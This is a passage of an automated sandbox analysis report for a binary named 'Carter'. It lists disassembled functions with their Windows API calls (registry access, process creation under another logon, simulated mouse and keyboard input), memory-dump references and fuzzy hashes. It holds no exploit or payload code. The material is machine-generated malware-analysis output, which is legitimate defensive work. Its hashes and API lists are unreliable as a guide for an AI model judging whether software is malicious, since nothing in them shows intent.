                                                                        • Instruction ID: 5450ca82c4d718b4728d9a9bdd75c78321dd942e078da861f99dcdd18dc2612f
                                                                        • Opcode Fuzzy Hash: 6fb7b245473cfacc6118506ef508f72e668d20f33a7137081e0330b4b98d0ee3
                                                                        • Instruction Fuzzy Hash: 99E01A71A90701BFEB712B75EC4DB6936A9B702B06FA08528B5C1E908CCBBF64459F04
                                                                        Function 0100428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,010041A8), ref: 010042A8
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 010042AF
                                                                        • EncodePointer.KERNEL32(00000000), ref: 010042BA
                                                                        • DecodePointer.KERNEL32(010041A8), ref: 010042D5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                        • String ID: RoUninitialize$combase.dll
                                                                        • API String ID: 3489934621-2819208100
                                                                        • Opcode ID: 70544947892b8dd3bd68098b1aa325f8e9d2574b9987f53af2c174bad8ecc74b
                                                                        • Instruction ID: bb210efe7f05ec2ff0fff357d4ebc98e09e7070300d8b301ee90fed6e495c739
                                                                        • Opcode Fuzzy Hash: 70544947892b8dd3bd68098b1aa325f8e9d2574b9987f53af2c174bad8ecc74b
                                                                        • Instruction Fuzzy Hash: BFE0B6B0E51700AFFB719B60AD0EB653AA8B701B02F904218FAC1E908CCBBF5504DB14
                                                                        Function 00FE218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 00FE21B8
                                                                        • GetWindowRect.USER32(?,?), ref: 00FE21F9
                                                                        • ScreenToClient.USER32(?,?), ref: 00FE2221
                                                                        • GetClientRect.USER32(?,?), ref: 00FE2350
                                                                        • GetWindowRect.USER32(?,?), ref: 00FE2369
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Client$Window$Screen
                                                                        • String ID:
                                                                        • API String ID: 1296646539-0
                                                                        • Opcode ID: 86d93ce78541c04505e090520dbebaaa4b0fe3e140366d53247ef6765d8e2abf
                                                                        • Instruction ID: 55108847b868a340db7969710cceb74d0a7cd64b88764c9e4efe8220c6921a69
                                                                        • Opcode Fuzzy Hash: 86d93ce78541c04505e090520dbebaaa4b0fe3e140366d53247ef6765d8e2abf
                                                                        • Instruction Fuzzy Hash: 45B16C39900289DFDF50CFA9C4807EDBBB5FF08310F148169ED99AB255EB35AA40DB64
                                                                        Function 01046A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 3253778849-0
                                                                        • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                                        • Instruction ID: b4793e5f9890a83cef54eb908c47383a25eec08760611f8dac791e50ba910b58
                                                                        • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                                        • Instruction Fuzzy Hash: 1D61E17050029EABDF12EF64CC81EFE77A8AF06308F044569F9955B2E2EB35E905DB50
                                                                        Function 01060844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 0106147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0106040D,?,?), ref: 01061491
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0106091D
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0106095D
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01060980
                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 010609A9
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 010609EC
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 010609F9
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                        • String ID:
                                                                        • API String ID: 4046560759-0
                                                                        • Opcode ID: 0fc7c70473a393da2f666006c0253b291f7289d7d2ed6367716da223c0e5c6ba
                                                                        • Instruction ID: 251b7314835b9a3c41e996ee56d690976f0d7e5de692074a22b710c7d1cce273
                                                                        • Opcode Fuzzy Hash: 0fc7c70473a393da2f666006c0253b291f7289d7d2ed6367716da223c0e5c6ba
                                                                        • Instruction Fuzzy Hash: F4517831208245AFE711EB64C885EAEBBE9FF85310F04491DF5C5872A5DB35E905CBA2
                                                                        Function 0103F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 0103F6A2
                                                                        • VariantClear.OLEAUT32(00000013), ref: 0103F714
                                                                        • VariantClear.OLEAUT32(00000000), ref: 0103F76F
                                                                        • _memmove.LIBCMT ref: 0103F799
                                                                        • VariantClear.OLEAUT32(?), ref: 0103F7E6
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0103F814
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                        • String ID:
                                                                        • API String ID: 1101466143-0
                                                                        • Opcode ID: 351c1dbf5c15916fbb011dc9f401702876cdd6b8a7fe173adceb835e13ce2958
                                                                        • Instruction ID: 736b9faf2978ff21c956f76034f64ad4101fe7c62e61a276a4e6bdbc35a1920e
                                                                        • Opcode Fuzzy Hash: 351c1dbf5c15916fbb011dc9f401702876cdd6b8a7fe173adceb835e13ce2958
                                                                        • Instruction Fuzzy Hash: 76514FB5A0020AEFDB14CF58C884AAAB7F8FF89314B158559E999DB304D735E911CBA0
                                                                        Function 010429B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 010429FF
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01042A4A
                                                                        • IsMenu.USER32(00000000), ref: 01042A6A
                                                                        • CreatePopupMenu.USER32 ref: 01042A9E
                                                                        • GetMenuItemCount.USER32(000000FF), ref: 01042AFC
                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01042B2D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                        • String ID:
                                                                        • API String ID: 3311875123-0
                                                                        • Opcode ID: 3b1b9e571978cb39734900e5bc4c4009864f94b9a045ea971024967d3fe9b2b3
                                                                        • Instruction ID: 9f0fd9dd5e7d8f288bd81a1eb857d6e8d37bb11dabf9ce579e5549c5f274d923
                                                                        • Opcode Fuzzy Hash: 3b1b9e571978cb39734900e5bc4c4009864f94b9a045ea971024967d3fe9b2b3
                                                                        • Instruction Fuzzy Hash: 2351A2B0B0030AEFDF25DF68E8C8AAEBBF4AF45314F1041A9F99197291D7709944CB91
                                                                        Function 00FE1B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00FE1B76
                                                                        • GetWindowRect.USER32(?,?), ref: 00FE1BDA
                                                                        • ScreenToClient.USER32(?,?), ref: 00FE1BF7
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FE1C08
                                                                        • EndPaint.USER32(?,?), ref: 00FE1C52
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                        • String ID:
                                                                        • API String ID: 1827037458-0
                                                                        • Opcode ID: beb9b3aeec521fbe944b2fb45bde4d911a465c6dad316c16a7bbf247911c9d51
                                                                        • Instruction ID: 15dd7d914bbc97416ebedde6575ba41602027c9a7ad2a3bb1be567cfc60531bc
                                                                        • Opcode Fuzzy Hash: beb9b3aeec521fbe944b2fb45bde4d911a465c6dad316c16a7bbf247911c9d51
                                                                        • Instruction Fuzzy Hash: 2641E3315002409FD721DF2ACC84FBA7BF8FB49724F240668F595C72A5C7369804EB61
                                                                        Function 0106BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShowWindow.USER32(010A77B0,00000000,011F5FB0,?,?,010A77B0,?,0106BC1A,?,?), ref: 0106BD84
                                                                        • EnableWindow.USER32(?,00000000), ref: 0106BDA8
                                                                        • ShowWindow.USER32(010A77B0,00000000,011F5FB0,?,?,010A77B0,?,0106BC1A,?,?), ref: 0106BE08
                                                                        • ShowWindow.USER32(?,00000004,?,0106BC1A,?,?), ref: 0106BE1A
                                                                        • EnableWindow.USER32(?,00000001), ref: 0106BE3E
                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0106BE61
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 642888154-0
                                                                        • Opcode ID: 2c8b620e59d838b10e2d58aed3a651cd290df9262b436b285cb96839798804cf
                                                                        • Instruction ID: f5e3cdaf1a597f36e51ea20e63c2366829a502268d4e476ec7dcb50bf32be06f
                                                                        • Opcode Fuzzy Hash: 2c8b620e59d838b10e2d58aed3a651cd290df9262b436b285cb96839798804cf
                                                                        • Instruction Fuzzy Hash: E6414DB4700144AFEB62DF28C889B947FE5BF05314F1841E9FA88CF2A6C732A845CB51
                                                                        Function 01057788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,0105550C,?,?,00000000,00000001), ref: 01057796
                                                                          • Part of subcall function 0105406C: GetWindowRect.USER32(?,?), ref: 0105407F
                                                                        • GetDesktopWindow.USER32 ref: 010577C0
                                                                        • GetWindowRect.USER32(00000000), ref: 010577C7
                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 010577F9
                                                                          • Part of subcall function 010457FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01045877
                                                                        • GetCursorPos.USER32(?), ref: 01057825
                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01057883
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                        • String ID:
                                                                        • API String ID: 4137160315-0
                                                                        • Opcode ID: a61c54992b8b569d82a62262c17a1b3868205f2541c6878723767a8b5cc4cf2f
                                                                        • Instruction ID: 445e0a0586ac3b125a23eb4c8020f76cc24a3c4af456342b25f8daf6a26ea5bb
                                                                        • Opcode Fuzzy Hash: a61c54992b8b569d82a62262c17a1b3868205f2541c6878723767a8b5cc4cf2f
                                                                        • Instruction Fuzzy Hash: 6331C472504316ABD760DF14D848FABBBE9FF89314F000929F9C5A7181CB75E909CB92
                                                                        Function 01039431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01038CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01038CDE
                                                                          • Part of subcall function 01038CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01038CE8
                                                                          • Part of subcall function 01038CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01038CF7
                                                                          • Part of subcall function 01038CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01038CFE
                                                                          • Part of subcall function 01038CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01038D14
                                                                        • GetLengthSid.ADVAPI32(?,00000000,0103904D), ref: 01039482
                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0103948E
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 01039495
                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 010394AE
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0103904D), ref: 010394C2
                                                                        • HeapFree.KERNEL32(00000000), ref: 010394C9
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                        • String ID:
                                                                        • API String ID: 3008561057-0
                                                                        • Opcode ID: dfbc5e6dd246a70c7b9e32b39dc83b94571bed6222ee96365a9cf9b8e5216267
                                                                        • Instruction ID: 6f993a2fac26f01711a2dab279e188db32cc488e396b3885b9dc9e754552184f
                                                                        • Opcode Fuzzy Hash: dfbc5e6dd246a70c7b9e32b39dc83b94571bed6222ee96365a9cf9b8e5216267
                                                                        • Instruction Fuzzy Hash: 9511A571501605FFEB508FA4DC09FAE7BADFB86315F108158F9C5A7104CB7A9900CB60
                                                                        Function 010391CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 01039200
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 01039207
                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 01039216
                                                                        • CloseHandle.KERNEL32(00000004), ref: 01039221
                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01039250
                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 01039264
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                        • String ID:
                                                                        • API String ID: 1413079979-0
                                                                        • Opcode ID: 6ee0eb457b4ee737a2fb680e143850cb92d7582e27b401ea8d7ab74833d79a68
                                                                        • Instruction ID: 03cc351c5fde064998dd880347400a76725c15dac94984c541a50fb7545e0ff8
                                                                        • Opcode Fuzzy Hash: 6ee0eb457b4ee737a2fb680e143850cb92d7582e27b401ea8d7ab74833d79a68
                                                                        • Instruction Fuzzy Hash: DB118C7290020DABEF118F98DC48FDE7BACEF49308F044154FE45A2064C3B68D60DB60
                                                                        Function 0103C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0103C34E
                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0103C35F
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0103C366
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0103C36E
                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0103C385
                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0103C397
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$Release
                                                                        • String ID:
                                                                        • API String ID: 1035833867-0
                                                                        • Opcode ID: 89036f2d981eec0bcf827ae607482c7d7ec91e7214726c040da23fbfa47af3e2
                                                                        • Instruction ID: 8b8a5d68c5f33a55f83f2fe108a945bc8052868aaf1fa0f2f8e96ad9a80265f7
                                                                        • Opcode Fuzzy Hash: 89036f2d981eec0bcf827ae607482c7d7ec91e7214726c040da23fbfa47af3e2
                                                                        • Instruction Fuzzy Hash: C5018875E00204BBEF105BA59D49A5EBFB8EB49721F004165FA44F7284D6719900CF90
                                                                        Function 0106C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FE1729
                                                                          • Part of subcall function 00FE16CF: SelectObject.GDI32(?,00000000), ref: 00FE1738
                                                                          • Part of subcall function 00FE16CF: BeginPath.GDI32(?), ref: 00FE174F
                                                                          • Part of subcall function 00FE16CF: SelectObject.GDI32(?,00000000), ref: 00FE1778
                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0106C57C
                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 0106C590
                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0106C59E
                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 0106C5AE
                                                                        • EndPath.GDI32(00000000), ref: 0106C5BE
                                                                        • StrokePath.GDI32(00000000), ref: 0106C5CE
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                        • String ID:
                                                                        • API String ID: 43455801-0
                                                                        • Opcode ID: 39c99183213cce661a67b127f298eeb03dda6a7743a26ffe86488cc5fb117c93
                                                                        • Instruction ID: ed8a18fad66573be5c5fbab13c9899b9e4edd70d3e0e42697c0109c974c86103
                                                                        • Opcode Fuzzy Hash: 39c99183213cce661a67b127f298eeb03dda6a7743a26ffe86488cc5fb117c93
                                                                        • Instruction Fuzzy Hash: 1211617240010CBFEF129F90DC48EDA3FADEF04364F048151FA8856164C776AD94DBA0
                                                                        Function 010007BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 010007EC
                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 010007F4
                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 010007FF
                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0100080A
                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 01000812
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100081A
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
